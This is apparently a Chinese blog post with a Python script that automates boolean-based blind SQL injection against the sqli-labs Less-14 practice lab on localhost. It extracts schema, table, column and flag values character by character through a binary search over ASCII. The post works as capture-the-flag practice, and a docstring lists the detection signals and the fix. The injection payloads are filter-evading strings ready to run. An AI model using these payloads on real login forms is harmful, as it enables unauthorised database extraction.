使用python脚本,判断返回页面中是否包含成功的flag图片,爆破出来数据库中的内容,实现自动爆破
"""Boolean-based blind SQL injection driver for the local sqli-labs Less-14 page.

The script never reads data from the response body; its only oracle is whether
the string "/images/flag.jpg" (the page's "login succeeded" image) appears in
the HTML. Each character position is resolved by a binary search over ASCII
33..130, so every position costs roughly seven POST requests whose `uname`
field differs only in the position and threshold substituted by str.format.
From a defensive standpoint that traffic shape (many near-identical POSTs to
one endpoint, an `information_schema` reference inside a form field, `/**/`
used in place of spaces, a trailing `-- ` comment) is the signal that should be
logged and blocked; parameterised queries on the server remove the oracle.
"""
import requests
import time  # NOTE(review): imported but unused in this script

# Target is the deliberately vulnerable sqli-labs lab on localhost.
url = "http://127.0.0.1/sqli-labs-master/Less-14/"
# Form fields posted on every request; "uname" is rewritten per probe,
# "passwd" and "submit" are fixed filler.
payload = {
    "uname" : "",
    "passwd" : "123456",
    "submit" : "Submit"
}
result = ""
# One outer iteration per character position (substr is 1-indexed in MySQL),
# up to 99 characters.
for i in range(1,100):
    # Binary-search bounds over printable ASCII; mid is the threshold tested.
    l = 33
    r =130
    mid = (l+r)>>1
    while(l<r):
        # enumerate database (schema) names
        payload["uname"] ="-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})-- ".format(i, mid)
        # enumerate table names
        #"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctfshow'),{0},1))>{1})-- ".format(i, mid)
        # enumerate column names
        #"-1\" or 0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'flagb'),{0},1))>{1})-- ".format(i,mid)
        #######################
        #"-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)
        #payload["uname"] ="-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)
        # No timeout and no error handling: a slow or unreachable server
        # blocks here indefinitely, and a non-200 reply is still searched.
        html = requests.post(url,data=payload)
        print(payload)
        # Oracle: the success image is present only when the injected
        # comparison "ascii(...) > mid" evaluated true on the server.
        if "/images/flag.jpg" in html.text:
            l = mid+1
        else:
            r = mid
        mid = (l+r)>>1
    # Stop once the resolved character is a space (treated as end of data).
    if(chr(mid)==" "):
        break
    result = result + chr(mid)
    print(result)
print("flag: " ,result)
标签:format,python,ascii,substr,mid,--,result,mysql,盲注 From: https://www.cnblogs.com/yeziwinone/p/18111715